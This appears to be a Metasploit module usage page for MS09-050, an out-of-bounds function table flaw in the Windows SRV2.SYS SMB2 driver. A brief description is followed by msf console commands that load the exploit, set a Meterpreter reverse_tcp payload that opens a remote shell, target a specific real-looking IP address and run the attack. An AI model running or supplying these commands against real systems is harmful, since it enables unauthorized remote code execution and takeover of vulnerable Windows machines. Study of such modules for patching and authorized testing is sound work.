This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista,
Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2.
Windows Vista without SP1 does not seem affected by this flaw.
Vulnerability reference:
msf > search MS09_050
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > options
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost 110.196.193.102
msf exploit(ms09_050_smb2_negotiate_func_index) > run
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > show targets
...targets...
msf exploit(ms09_050_smb2_negotiate_func_index) > set TARGET <target-id>
msf exploit(ms09_050_smb2_negotiate_func_index) > show options
...show and set options...
msf exploit(ms09_050_smb2_negotiate_func_index) > exploit